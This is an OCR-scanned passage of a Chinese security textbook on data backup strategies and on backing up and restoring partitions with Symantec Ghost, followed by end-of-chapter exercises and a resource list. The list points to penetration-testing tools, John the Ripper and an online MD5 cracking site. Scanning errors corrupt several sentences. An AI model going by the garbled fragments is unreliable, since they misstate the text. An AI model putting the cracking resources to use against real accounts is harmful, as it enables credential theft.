些 , 但 是 恢复 起 来 要 慢 一 些 。 

D 按 需 备份 。 按 需 备 份 根据 临时 需要 有 选择 地 进行 数据 备份 。 

备份 策略 就 是 确定 备份 内 容 、 备 份 时 间 与 备份 方式 等 ,在 实际 应 用 中 ,备份 策略 通常 是 
以 上 4 种 备份 方式 的 结合 ,例如 每 周一 至 周 六 进行 一 次 增 量 备份 或 差分 备份 ,每 周 日 、 每 月 
底 和 每 年 底 进行 一 次 全 备份 。 

(2) 按 备 份 的 状态 来 划分 

按 备份 的 状态 来 划分 ,有 物理 备份 和 逻辑 备份 。 

(D 物理 备份 。 物 理 备份 是 指 将 实际 物理 数据 库 文件 从 一 处 复制 到 另 一 处 的 备份 ,物理 
备份 又 包含 冷 备 份 和 热 备 份 。 

冷 备份 也 称 脱 机 备份 ,是 指 以 正常 方式 关闭 数据 库 , 并 对 数据 库 的 所 有 文件 进行 备份 。 
其 缺点 是 需要 一 定 的 时 间 来 完成 ,在 恢复 期 间 , 最 终 用 户 无 法 访问 数据 库 , 而 且 这 种 方法 不 
易 做 到 实时 的 备份 。 

热 备 份 也 称 联 机 备份 .是 指 在 数据 库 打 开 和 用 户 对 数据 库 进 行 操作 的 装填 下 进行 的 备 
y; 也 指 通过 使 用 数据 库 系 统 的 复制 服务 器 ,连接 正在 运行 的 主 数据 库 服务 器 和 热 备份 服 
务 器 ,当主 数据 库 的 数据 修改 时 ,变化 的 数据 通过 复制 服务 器 可 以 传递 到 备份 数据 库 服 务 器 
中 ,保证 两 个 服务 器 中 的 数据 一 致 。 这 种 热 备份 方式 实际 上 是 一 种 实时 备份 ,两 个 数据 库 分 
别 运行 在 不 同 的 机 器 上 ,并 且 每 个 数据 库 都 写 到 不 同 的 数据 设备 中 。 

© 风 辑 备份 。 逻 辑 备份 就 是 将 某 个 数据 库 的 记录 读 出 并 将 其 写 入 一 个 文件 中 ,这 是 经 
常 使 用 的 一 种 备份 方式 。SQL Server 和 Oracle 等 都 提供 Export/Import 工具 来 进行 数据 
库 的 逻辑 备份 。 

(3) 从 备份 的 层次 上 划分 

从 备份 的 层次 上 划分 ,可 分 为 硬件 宛 余 和 软件 备份 。 硬 件 元 余 技 术 有 双 机 容错 、 磁 盘 双 
工 、 磁 盘 阵 列 (RAID) 与 磁盘 镜像 等 多 种 形式 。 理 想 的 备份 系统 应 使 用 硬件 容错 来 防止 硬 
件 障 碍 ,使 用 软件 备份 和 硬件 容错 相 结 合 的 方式 来 解决 软件 故障 或 人 为 误 操 作 造成 的 数据 
XA. 

(4) 从 备份 的 地 点 来 划分 

从 备份 的 地 点 来 划分 ,可 分 为 本 地 备份 和 异地 备份 。 
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3. 数据 备份 系统 功能 要 求 
一 般 来 说 ,一 个 完善 的 备份 系统 ,应 该 具备 的 功能 见 表 8-3。 
表 8-3 ”数据 备份 系统 功能 要 求 

原则 说 o 明 
保护 性 | 全 面 保护 企业 的 数据 ,在 灾难 发 生 时 能 快速 可 靠 地 进行 数据 恢复 
稳定 性 | 备份 软件 一 定 要 与 操作 系统 完全 兼容 ,并 且 当 事故 发 生 时 能 够 快速 有 效 地 恢复 数据 
全 面 性 | 选用 的 备份 软件 要 能 支持 各 种 操作 系统 ,数据库 和 典型 应 用 
自动 化 备份 方案 应 能 提供 定时 的 自动 备份 ,并 利用 磁带 库 等 技术 进行 自动 换 带 。 在 自动 备份 过 程 
中 ,还 要 有 日 志 记录 功能 ,并 在 出 现 异 常情 况 时 自动 报警 
高 性 能 | 设计 备份 时 要 尽量 考虑 提高 数据 备份 的 速度 ,采用 多 个 磁带 机 并 行 操作 的 方法 
操作 简单 数据 备份 应 用 于 不 同 领域 ,进行 数据 备份 的 操作 人 员 水 平 参差 不 齐 , 这 就 需要 一 个 直观 、 操 
作 简 单 的 图 形 化 用 户 界面 
有 些 关键 性 任务 需要 24 小 时 不 停机 运行 ,进行 备份 时 ,有 些 文件 可 能 仍 处 于 打开 状态 。 在 
实时 性 | 这 种 情况 下 备份 ,必须 采取 措施 ,实时 查看 文件 大 小 、 进 行事 务 跟踪 ,以 保证 正确 地 备份 系统 
中 的 所 有 文件 
数据 是 备份 在 磁带 上 的 ,要 对 磁带 进行 保护 ,并 确保 备份 磁带 中 数据 的 可 靠 性 ,这 是 一 个 至 
容错 性 | 关 重 要 的 方面 。 若 引入 (RAID) 技 术 对 磁带 进行 镜像 ,就 能 更 好 地 保证 数据 安全 可 靠 ,等 于 
给 用 户 再 加 一 把 保险 锁 备 份 策略 的 规划 
备份 最 大 的 鼠 讳 就 是 在 备份 过 程 中 因 介质 容量 的 不 足 而 更 换 介 质 ,这 样 会 降低 备份 数据 的 
可 靠 性 与 完整 性 ,因此 要 求 存储 介质 能 够 进行 扩展 


可 扩展 性 


4. 在 制定 或 规划 备份 策略 时 需要 考虑 的 因素 

CD 选择 合适 的 备份 频率 。 

(2) 根据 数据 的 重要 性 可 选择 一 种 或 几 种 备份 交叉 的 形式 制定 备份 策略 。 

(3) 当 数 据 库 比 较 小 ,或 者 当 数 据 库 实时 性 不 强 或 者 是 只 读 的 , 则 备份 的 介质 可 采用 磁 
盘 或 光盘 。 在 备份 策略 上 可 执行 每 天 一 次 数据 库 增 量 备份 .每 周 进行 一 次 完全 备份 。 备 份 
时 间 尽 量 选择 在 晚上 服务 器 比较 空闲 的 时 间 段 进行 ,备份 数据 保存 在 一 星期 以 上 。 

(4) 就 一 般 策略 来 说 , 当 数 据 库 的 实时 性 要 求 较 强 ,或 数据 的 变化 较 多 而 数据 需要 长 期 
保存 时 , 则 备份 介质 可 采用 磁盘 或 磁带 。 在 备份 策略 上 可 选择 每 天 两 次 ,甚至 每 小 时 一 次 的 
数据 库 热 完 全 备份 或 事务 日 志 备份 。 为 把 灾难 损失 减少 到 最 小 程度 ,备份 数据 应 保存 一 个 
月 以 上 。 同 时 每 季度 或 每 半年 可 以 考虑 再 做 一 次 光盘 备份 。 另 外 每 当 数 据 库 的 结构 发 生变 
化 ,或 进行 批量 数据 处 理 前 应 做 一 次 数据 库 的 完全 备份 , 且 这 个 备份 数据 要 长 期 保存 。 

(5) 当 实现 数据 库 文件 或 者 文件 组 备份 策略 时 ,应 时 常备 份 事务 日 志 。 当 巨大 的 数据 
库 分 布 在 多 个 文件 上 时 ,必须 使 用 这 种 策略 。 

(6) 备份 数据 的 保管 和 记录 是 防止 数据 丢失 的 另 一 个 重要 的 因素 。 这 将 避免 数据 备份 
进度 的 混乱 ,应 清楚 记录 所 有 步骤 .并 为 实施 备份 的 所 有 人 员 提 供 此 类 信息 ,以 免 发 生 问题 
时 东 手 无 策 。 数 据 备 份 与 关键 应 用 服务 器 最 好 是 分 散 保管 在 不 同 的 地 方 , 通 过 网 络 进行 数 
据 备份 。 定 时 清洁 和 维护 磁带 机 或 光盘 。 把 磁带 和 光盘 放 在 合适 的 地 方 ,避免 磁带 和 光盘 
放置 在 过 热 和 潮湿 环境 。 备 份 的 磁带 和 光盘 最 好 只 许 网 络 管理 员 和 系统 管理 员 访 问 。 要 完 
整 清晰 地 做 好 备份 磁带 和 光盘 的 标签 。 
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5. 制订 备份 策略 应 考虑 的 问题 

(1) 存储 系统 容量 和 性 能 要 合适 。 

(2) 可 靠 性 、 高 性 能 和 可 用 性 。 

(3) 保护 已 有 投资 。 

(4) 不 能 重 硬 轻 软 ,而 应 软 硬 件 并 举 。 

(5) 不 要 过 分 依赖 异地 容 灾 中 心 ,还 应 该 将 数据 备份 到 最 终归 宿 (磁带 .光盘 等 ) 。 
(6) 完善 的 管理 方法 。 


83 Ghost 


8.3.1 Ghost 概述 


1. Ghost 简介 

Ghost(General Hardware Oriented Software Transfer, 面 向 通用 型 硬件 的 软件 传送 器 ) 
软件 是 美国 赛 门 铁 克 公司 推出 的 一 款 出 色 的 用 于 系统 .数据 备份 与 恢复 的 工具 ,支持 的 磁盘 
分 区 文件 系统 格式 包括 FAT、FAT32、NTFS .ext2 ext3 等 。 在 这 些 用 处 当中 ,数据 备份 的 
功能 得 到 极 高 频率 的 使 用 ,以 至 于 人 们 一 提起 Ghost 就 把 它 和 克隆 挂 钓 ,往往 忽略 了 它 其 
他 的 一 些 功能 。 在 微软 的 视窗 操作 系统 广 为 流 传 的 基础 上 ,为 避 开 视窗 操作 系统 安装 的 费 
时 和 困难 ,有 人 把 Ghost 的 备份 还 原 操作 流程 简化 成 批 处 理 菜单 式 软 件 打包 ,例如 一 键 
Ghost, 一 键 还 原 精灵 等 ,使 得 它 的 操作 更 加 容易 ,进而 得 到 众多 的 菜鸟 级 人 员 的 喜爱 。 巾 
于 它 和 它 制 作 的 . gho 文件 连 为 一 体 的 视窗 操作 系统 Windows XP/Windows 7 等 作品 被 爱 
好 者 研习 实验 ,Ghost 在 狭义 上 又 被 人 特 指 为 能 快速 安装 的 视窗 操作 系统 。 

Ghost 不 同 于 其 他 的 备份 软件 . 它 是 将 整个 硬盘 或 硬盘 的 一 个 分 区 作为 一 个 对 象 来 操 
作 , 可 以 将 对 象 打包 压缩 成 为 一 个 映像 文件 (Image) ,在 需要 的 时 候 , 又 可 以 把 该 映像 文件 
恢复 到 对 应 的 分 区 或 对 应 的 硬盘 中 。 

Ghost 的 功能 包括 两 个 硬盘 之 间 的 对 拷 两 个 硬盘 的 分 区 之 间 的 对 拷 两 台 计 算 机 硬盘 之 
间 的 对 拷 、 制 作 硬盘 的 映像 文件 等 ,用 得 比较 多 的 是 分 区 备份 功能 ,能 将 硬盘 的 一 个 分 区 压缩 
备份 成 映像 文件 ,然后 存储 在 另 一 个 分 区 中 ,如 果 原 来 的 分 区 发 生 问题 ,可 以 用 备件 的 映像 文 
件 进行 恢复 。 基 于 此 ,可 以 利用 Ghost 来 备份 /恢复 系统 。 对 于 学 校 和 网 吧 ,使 用 Ghost 软 
件 进行 硬盘 对 拷 可 迅速 方便 地 实现 系统 的 快速 安装 和 恢复 ,而且 维护 起 来 也 比较 容易 。 

Ghost 的 备份 还 原 是 以 硬盘 的 扇 区 为 单位 进行 的 ,也 就 是 说 可 以 将 一 个 硬盘 上 的 物理 信 
息 完 整 复制 ,而 不 仅仅 是 数据 的 简单 复制 ; Ghost 支持 将 分 区 或 硬盘 直接 备份 到 一 个 扩展 名 
为 . gho 的 文件 里 (. gho 的 文件 称 为 镜像 文件 ) ,也 支持 直接 备份 到 另 一 个 分 区 或 硬盘 里 。 

新 版 本 的 Ghost 包括 DOS 版 和 Windows 版 , DOS 版 只 能 在 DOS 环境 中 运行 。 
Windows 版 只 能 在 Windows 环境 中 运行 。 不 管 是 在 DOS 下 运行 Ghost(ghost. exe) 还 是 
在 Windows 下 运行 Ghost, 两 者 的 操作 界面 都 是 一 致 的 ,实现 相同 的 功能 ,但 是 在 Windows 
下 运行 Ghost(Windows 版 Ghost) 时 是 不 能 恢复 Windows 操作 系统 所 在 的 分 区 ,因此 在 这 
种 情况 下 需要 在 DOS 下 运行 Ghost DOS 版 Ghost), H F DOS 的 高 稳定 性 ,并 且 在 纯 
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DOS 环境 中 已 经 脱离 了 Windows 环境 ,所 以 建议 备份 Windows 操作 系统 时 使 用 DOS 版 的 
Ghost 软件 。 

由 于 Ghost 在 备份 还 原 是 按 扇 区 来 进行 复制 ,所 以 在 操作 时 一 定 要 小 心 , 不 要 把 目标 
盘 ( 分 区 ) 和 弄 错 了 ,不 然 会 将 目标 盘 ( 分 区 ) 的 数据 全 部 抹 掉 ,所 以 一 定 要 细心 。 

2. Ghost 使 用 方案 

(1) 备份 系统 

完成 操作 系统 及 各 种 驱动 的 安装 后 ,将 常用 的 软件 (如 杀毒 .媒体 播放 软件 .Office 办 公 
软件 等 ) 安 装 到 系统 所 在 盘 , 接 着 安装 操作 系统 和 常用 软件 的 各 种 升级 补丁 ,然后 优化 系统 ， 
最 后 在 DOS 下 做 系统 盘 的 备份 。 

(20 恢复 系统 

当 感 觉 系统 运行 缓慢 时 (此 时 多 半 是 由 于 经 常安 装卸 载 软件 ,残留 或 误 删 了 一 些 文件 ， 
导致 系统 紊乱 )、 系 统 骨 溃 时 .中 了 比较 难 杀 除 的 病毒 时 ,就 要 进行 系统 恢复 了 。 

(3) 备份 /恢复 分 区 数据 

用 Ghost 可 以 十 分 方便 地 备份 或 恢复 分 区 数据 。 

(4) 磁盘 碎片 整理 

有 时 如 果 长 时 间 没 整理 磁盘 碎片 ,又 不 想 花 长 时 间 整 理 时 ,也 可 以 先 备 份 该 分 区 ,然后 
再 恢复 该 分 区 ,这 样 比 单纯 磁盘 碎片 整理 速度 要 快 。Ghost 备份 分 区 时 ,会 自动 跳 过 分 区 中 
的 空白 部 分 ,只 把 数据 写 到 . gho 映像 文件 中 。 人 恢复 分 区 时 ,Ghost JU. gho 文件 中 的 内 容 连 
续 写 入 分 区 ,因此 该 分 区 中 就 不 存在 磁盘 碎片 了 。 

(5) 修复 PQ 分 区 产生 的 错误 

当 使 用 PQ 工具 分 区 失败 后 ,会 导致 分 区 (假如 是 下 盘 ) 中 的 文件 消失 ,此 时 可 以 考虑 用 
Ghost 试 着 解决 该 问题 。 先 进入 Ghost, 依 次 选择 Local/Check/Disk F45% A f. 1E 3 
定 不 要 选 错 ) , 按 回 车 键 ,开始 检测 。 如 果 检 测 进程 发 现 原 分 区 中 的 文件 , 找 回 数据 就 有 和 希 
H, JEH Ghost 把 F 盘 做 一 个 镜像 文件 保存 在 下 盘 , 然 后 将 下 盘 格 式 化 ,接着 用 Ghost 
Explorer 打开 镜像 文件 .把 其 中 的 文件 提取 到 下 盘 。 


8.3.2 实例 : 用 Ghost 备份 分 区 (系统 ) 


下 面 以 备份 C 盘 为 例 介 绍 Ghost 的 使 用 ,实例 中 的 截图 是 在 Windows 下 运行 Ghost 
11 截取 的 ,读者 需要 根据 实际 情况 选用 Windows 版 Ghost 或 者 DOS 版 Ghost。 

第 1 步 : 使 用 工具 盘 ( 比 如 番茄 花园 /雨林 木 风 / 深 度 安 装 盘 ) 进 入 Ghost, 或 者 进入 
DOS ,在 命令 行 执 行 Ghost. exe 命令 ,启动 Ghost 之 后 ,显示 如 图 8-9 所 示 的 画面 。 

第 2 步 : 在 图 8-9 中 , 单 击 OK 按钮 ,显示 如 图 8-10 所 示 的 画面 。 如 果 没 有 鼠标 ,可 以 
使 用 键盘 进行 操作 : Tab 键 进行 切换 、 方 向 键 进行 选择 、Enter 键 进行 确认 。 接 下 来 选择 本 
地 硬盘 ,如 图 8-11 所 示 。 

主 菜单 项 及 其 说 明 见 表 8-4。 

注意 : 当 计 算 机 上 没有 安装 网 络 协议 的 驱动 时 ,Peer to Peer 和 GhostCast 选项 将 不 可 
用 (在 DOS 下 一 般 都 没有 安装 ) 。 
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Symantec Ghost 11.0.1 Corporate Edition 
Symantec Corporation 
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图 8-9 进入 Ghost 


图 8-10 ”操作 菜单 


菜单 项 


图 8-11 选择 本 地 硬盘 


表 8-4 ERAM 
说 明 


Local 


本 地 操作 ,对 本 地 计算 机 上 的 硬盘 进行 操作 


Peer to Peer 


通过 点 对 点 模式 对 网 络 计算 机 上 的 硬盘 进行 操作 


GhostCast 通过 单 播 /多 播 或 者 广播 方式 对 网 络 计算 机 上 的 硬盘 进行 操作 
Options 使 用 Ghost 时 的 一 些 选项 ,一 般 使 用 默认 设置 即 可 

Help 一 个 简洁 的 帮助 

Quit 退出 Ghost 
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在 菜单 中 单 击 Local( 本 地 ) 菜 单项 ,在 右边 弹出 的 菜单 中 有 3 个 子 菜单 项 ,Local T3 

单项 及 其 说 明 见 表 8-5。 
表 8-5 Local 子 菜单 项 

菜单 项 说 明 

Disk 表示 备份 整个 硬盘 ( 即 硬盘 克隆 ) 

Partition 表示 备份 硬盘 的 单个 分 区 
表示 检查 硬盘 或 备份 的 文件 ,查看 是 否 可 能 因 分 区 、 硬 盘 被 破坏 等 造成 备份 或 还 原 
失败 


Check 


在 菜单 中 单 击 Partition( 分 区 ) 菜 单项 ,在 右边 弹出 的 菜单 中 有 3 个 子 菜单 项 ,Partition 
子 菜单 项 及 其 说 明 见 表 8-6。 
表 8-6 Partition 子 菜单 项 


菜单 项 说 明 
To Partion 将 一 个 分 区 的 内 容 复 制 到 另外 一 个 分 区 
To Image 将 一 个 或 多 个 分 区 的 内 容 复 制 到 一 个 镜像 文件 中 。 一 般 备 份 系统 均 选 择 此 操作 
From Image 将 镜像 文件 恢复 到 分 区 中 。 当 系统 备份 后 ,可 选择 此 操作 恢复 系统 


第 3 步 : 在 图 8-10 中 ,这 里 要 对 本 地 磁盘 进行 操作 ,依次 选择 Local- Partition To 
Image( 字 体 变 白色 ,注意 ,一 定 不 要 选 错 ) ,然后 按 Enter 键 ,显示 如 图 8-11 所 示 的 画面 , 因 
为 本 系统 只 有 一 块 硬盘 ,所 以 不 用 选择 硬盘 了 ,直接 按 Enter 键 后 ,显示 如 图 8-12 所 示 的 
inii ifi o 

第 4 步 : 在 图 8-12 中 ,选择 要 备份 的 分 区 ,在 此 选择 第 一 个 主 分 区 , 即 系统 分 区 (C 盘 )， 
然后 单 击 OK 按钮 ,显示 如 图 8-13 所 示 的 画面 。 


6000 


8-12 选择 要 备份 的 分 区 
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图 8-13 选择 镜像 文件 存放 的 位 置 .输入 文件 名 


第 5 步 : 在 图 8-13 中 ,选择 镜像 文件 存放 的 位 置 ,输入 镜像 文件 名 (WinxpBac) ,然后 单 
击 Save 按钮 ,显示 如 图 8-14 所 示 的 画面 。 


Symantec Ghost 11.0.1 Copyrigh? CC) 1998-2007 Symantec Corporation. AI rights reserved. 


Type:b [Fat32], 6000 HB, 3896 HB used, SYSTEH 


from Local drive [1], 152626 HB 
Local file H:\HinxpBac.6HO 


图 8-14 单 击 Fast 按钮 开始 备份 


第 6 步 : 在 图 8-14 中 ,给 出 3 个 选择 。 
No: 表示 终止 压缩 备份 操作 。 
Fast; 表示 压缩 比例 小 但 是 备份 速度 较 快 ,一 般 情况 推荐 该 操作 。 
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High: 表示 压缩 比例 高 但 是 备份 速度 很 慢 , 如 果 不 是 经 常 执行 备份 与 恢复 操作 ,可 选 该 
操作 。 

单 击 Fast 按钮 ,整个 备份 过 程 一 般 需 要 几 分 钟 到 十 几 分 钟 不 等 ,具体 时 间 与 要 备份 分 
区 的 数据 多 少 以 及 硬件 速度 等 因素 有 关 , 备 份 完 成 后 将 提示 操作 已 经 完成 , 按 Enter 键 后 返 
回 到 Ghost 程序 主 画 面 。 要 退出 Ghost ,选择 Quit 并 按 Enter 键 。 

备份 系统 分 区 之 后 ,就 不 需 担 心 因 试用 某 个 软件 或 修改 系统 的 某 些 参数 导致 系统 崩溃 
了 。 如 果 崩 溃 , 也 能 迅速 将 系统 恢复 成 原始 状态 ,无 须 重新 安装 程序 或 系统 。 


8.3.3 实例 : 用 Ghost 恢复 系统 


第 1 步 : 在 图 8-10 中 ,依次 选择 Local Partition? From Image( 字 体 变 白色 ,注意 一 定 
不 要 选 错 ) ,然后 按 Enter 键 ,显示 如 图 8-15 所 示 的 画面 。 

第 2 步 : 在 图 8-15 中 选择 系统 镜像 文件 (WinxpBac. GHO) ,然后 单 击 Open 按钮 ,在 随 
后 显示 的 画面 中 单 击 OK 按钮 ,显示 如 图 8-16 所 示 的 画面 。 


[Image file name to restore from 


图 8-16 选择 目的 硬盘 


第 3 步 : 在 图 8-16 中 ,因为 本 系统 只 有 一 块 硬盘 ,所 以 不 用 选择 硬盘 了 ,直接 按 Enter 
键 后 ,显示 如 图 8-17 所 示 的 画面 ,在 图 8-17 中 选择 要 恢复 到 的 分 区 (这 一 步 要 特别 小 心 )， 
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9889 容 灾 与 数据 备份 技术 
在 此 要 将 镜像 文件 (WinxpBac. GHO) 恢 复 到 C 盘 ( 第 一 个 分 区 ,系统 分 区 ), 按 Enter 键 , 显 
示 如 图 8-18 所 示 的 画面 。 


图 8-17 选择 目的 硬盘 中 的 分 区 
第 4 步 : 在 图 8-18 中 单 击 Yes 按钮 ,开始 恢复 分 区 。 恢 复 完成 后 ,重启 计算 机 即 可 。 


ec Ghost 11.0.1 Copyright CC) 1998-2007 Symantec Corporation. AIl rights reserved, 


Type:b [Fat32], 6000 HB, 1688 HB used, SYSTEM 
from Local file H:\sysbac\HinxpBac.GHO, 152626 HB 
Type:b [Fat32], 6000 HB 

from Local drive [1], 152626 HB 


图 8-18 是 否 恢复 分 区 


84 本 章 小 结 


本 章 介绍 了 容 灾 技 术 的 基本 概念 .RAID 级 别 及 其 特点 、 数 据 备 份 技术 的 基本 概念 以 及 
Ghost 的 使 用 。 通 过 本 章 的 学 习 , 使 读者 理解 容 灾 与 数据 备份 技术 在 信息 安全 领域 有 着 举 
足 轻 重 的 地 位 ,在 以 后 的 生活 或 工作 中 ,要 强化 安全 意识 ,采取 有 效 的 容 灾 与 数据 备份 技术 
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1. 填空 题 

a) 是 指 在 发 生 灾难 性 事故 时 ,能 够 利用 已 备份 的 数据 或 其 他 手段 ,及 时 对 原 
系统 进行 恢复 ,以 保证 数据 的 安全 性 以 及 业务 的 连续 性 。 

(2) 威胁 数据 的 安全 ,造成 系统 失效 的 主要 原因 有 . 和 等 。 

(3) 容 灾 可 以 分 为 3 个 级 别 : x 和 

(4) 一 个 完整 的 容 灾 系 统 应 该 包含 3 个 部 分 : 和 

(5) 对 于 容 灾 系 统 来 说 ,所 包含 的 关键 技术 有 ` 灾 难 检测 、 系 统 迁移 
和 灾难 恢复 5 个 方面 。 

(6) 建立 容 灾 备份 系统 时 会 涉及 多 种 技术 ,如 和 等 。 

CD 目前 RAID 技术 大 致 分 为 两 种 : 和 ; 

(8) 就 是 将 数据 以 某 种 方式 加 以 保留 ,以 便 在 系统 遭受 破坏 或 其 他 特定 情况 
下 ,重新 加 以 利用 的 一 个 过 程 。 

(9) 按 备份 的 数据 量 来 划分 ,有 s \ 增 量 备份 和 按 需 备份 。 

2. 思考 与 简 答题 

(1) 简 述 容 灾 的 重要 性 。 

(2) 简 述 导致 系统 灾难 的 原因 。 

(3) 简 述 容 灾 的 级 别 及 其 含义 。 

(4) 简 述 SAN、DAS、NAS. 远 程 镜像 技术 、 虚 拟 存储 、 基 于 IP 的 SAN 的 互联 技术 、 快 
照 技 术 等 容 灾 备份 技术 。 

(5) 简 述 数据 备份 的 重要 性 。 

(6) 简 述 容 灾 计划 所 包括 的 一 系列 应 急 计 划 。 

C) RAID 有 哪些 级 别 ? 它们 各 自 的 优 缺 点 有 哪些 ? 

3. 上 机 题 

CD. 首先 删除 某 分 区 中 的 某 些 数据 ,然后 使 用 某 种 数据 恢复 工具 来 恢复 被 删除 的 数据 。 

(2) 用 Ghost 备份 系统 。 
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网 站 资源 


www.kali.org 一 个 Linux 发 行 版 ,用 来 做 数字 取证 和 渗透 测试 

www. metasploit. com ”应 用 最 广 的 渗透 测试 软件 

www.aircrack-ng. org 与 802. 11 标准 有 关 的 无 线 网 络 安全 分 析 软 件 
nmap. org 免费 的 安全 扫描 器 ,用 于 网 络 勘测 和 安全 审计 

www. tcpdump. org 一 种 常见 的 命令 行 数 据 包 分 析 工 具 

www. wireshark. org 一 个 UNIX 和 Windows 系统 的 传输 协议 分 析 工 具 


network-tools. com ”网 络 工具 列表 ,比如 有 Traceroute, Ping, DNS Lookup, WHOIS 等 


www.openwall.com/john/ ”快速 破解 密码 
www. md5crack. com/ 在线 MD5 破解 


. www. shodan.io/ 面向 物 联 网 的 搜索 引擎 

. www.2cto.com 红 黑 联盟 

. bobao.360.cn 360 安全 播报 

. infosec. org. cn” 中国 计算 机 安全 

. www.china-infosec. org. cn 中国 计算 机 学 会 计算 机 安全 专业 委员 会 网 站 

. www. cert. org.cn 国家 计算 机 网 络 应 急 技术 处 理 协调 中 心 

。bobao. 360. cn/news/detail/1132. html 国外 整理 的 一 套 在 线 渗透 测试 资源 合集 
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